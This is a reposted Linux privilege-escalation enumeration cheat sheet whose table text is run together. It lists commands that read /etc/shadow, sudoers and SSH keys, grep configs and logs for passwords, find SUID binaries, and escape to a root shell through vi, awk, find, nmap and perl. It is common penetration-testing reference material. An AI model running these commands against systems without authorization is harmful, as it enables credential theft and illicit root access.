linux提权总结

ernel, Operating System & Device Information:CommandResultuname -aPrint all available system informationuname -rKernel releaseuname -nSystem hostnamehostnameAs aboveuname -mLinux kernel architecture (32 or 64 bit)cat /proc/versionKernel informationcat /etc/*-releaseDistribution informationcat /etc/issueAs abovecat /proc/cpuinfoCPU informationdf -aFile system information

 

Users & Groups:

CommandResultcat /etc/passwdList all users on the systemcat /etc/groupList all groups on the systemfor i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/nullList all uid’s and respective group membershipscat /etc/shadowShow user hashes – Privileged commandgrep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'List all super user accountsfingerUsers currently logged inpinkyAs aboveusersAs abovewho -aAs abovewWho is currently logged in and what they’re doinglastListing of last logged on userslastlogInformation on when all users last logged inlastlog –u %username%Information on when the specified user last logged inlastlog |grep -v "Never"Entire list of previously logged on users

 

User & Privilege Information:

CommandResultwhoamiCurrent usernameidCurrent user informationcat /etc/sudoersWho’s allowed to do what as root –Privileged commandsudo -lCan the current user perform anything as rootsudo -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\
|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\
|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/nullCan the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

 

Environmental Information:

CommandResultenvDisplay environmental variablessetAs aboveecho $PATHPath informationhistoryDisplays command history of current userpwdPrint working directory, i.e. ‘where am I’cat /etc/profileDisplay default system variablescat /etc/shellsDisplay available shells

 

Interesting Files:

CommandResultfind / -perm -4000 -type f 2>/dev/nullFind SUID filesfind / -uid 0 -perm -4000 -type f 2>/dev/nullFind SUID files owned by rootfind / -perm -2000 -type f 2>/dev/nullFind GUID filesfind / -perm -2 -type f 2>/dev/nullFind world-writeable filesfind / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/nullFind world-writeable files excluding those in /procfind / -perm -2 -type d 2>/dev/nullFind word-writeable directoriesfind /home –name *.rhosts -print 2>/dev/nullFind rhost config filesfind /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;Find *.plan files, list permissions and cat the file contentsfind /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;Find hosts.equiv, list permissions and cat the file contentsls -ahlR /root/See if you can access other user directories to find interesting filescat ~/.bash_historyShow the current users’ command historyls -la ~/.*_historyShow the current users’ various history filesls -la /root/.*_historyCan we read root’s history filesls -la ~/.ssh/Check for interesting ssh files in the current users’ directoryfind / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -laFind SSH keys/host informationls -la /usr/sbin/in.*Check Configuration of inetd servicesgrep -l -i pass /var/log/*.log 2>/dev/nullCheck log files for keywords (‘pass’ in this example) and show positive matchesfind /var/log -type f -exec ls -la {} \; 2>/dev/nullList files in specified directory (/var/log)find /var/log -name *.log -type f -exec ls -la {} \; 2>/dev/nullList .log files in specified directory (/var/log)find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/nullList .conf files in /etc (recursive 1 level)ls -la /etc/*.confAs abovefind / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/nullFind .conf files (recursive 4 levels) and output line number where the word ‘password’ is locatedlsof -i -nList open files (output will depend on account privileges)head /var/mail/rootCan we read roots mail

 

Service Information:

CommandResultps aux | grep rootView services running as rootps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'Lookup process binary path and permissionscat /etc/inetd.confList services managed by inetdcat /etc/xinetd.confAs above for xinetdcat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/nullA very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of eachls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/nullPermissions and contents of /etc/exports (NFS)

 

Jobs/Tasks:

CommandResultcrontab -l -u %username%Display scheduled jobs for the specified user – Privileged commandls -la /etc/cron*Scheduled jobs overview (hourly, daily, monthly etc)ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/nullWhat can ‘others’ write in /etc/cron* directoriestopList of current tasks

 

Networking, Routing & Communications:

CommandResult/sbin/ifconfig -aList all network interfacescat /etc/network/interfacesAs abovearp -aDisplay ARP communicationsrouteDisplay route informationcat /etc/resolv.confShow configured DNS sever addressesnetstat -antpList all TCP sockets and related PIDs (-p Privileged command)netstat -anupList all UDP sockets and related PIDs (-p Privileged command)iptables -LList rules – Privileged commandcat /etc/servicesView port numbers/services mappings

 

Programs Installed:

CommandResultdpkg -lInstalled packages (Debian)rpm -qaInstalled packages (Red Hat)sudo -VSudo version – does an exploit exist?httpd -vApache versionapache2 -vAs aboveapache2ctl (or apachectl) -MList loaded Apache modulesmysql --versionInstalled MYSQL version detailspsql -VInstalled Postgres version detailsperl -vInstalled Perl version detailsjava -versionInstalled Java version detailspython --versionInstalled Python version detailsruby -vInstalled Ruby version detailsfind / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)Locate ‘useful’ programs (netcat, wget etc)which %program_name% (i.e. nc, netcat, wget, nmap etc)As abovedpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/nullList available compilerscat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'Which account is Apache running as

 

Common Shell Escape Sequences:

CommandProgram(s):!bashvi, vim:set shell=/bin/bash:shellvi, vim!bashman, more, lessfind / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;findawk 'BEGIN {system("/bin/bash")}'awk--interactivenmapperl -e 'exec "/bin/bash";'Perl

转载自：http://www.rebootuser.com/?p=1623#.VzPhuda1nCI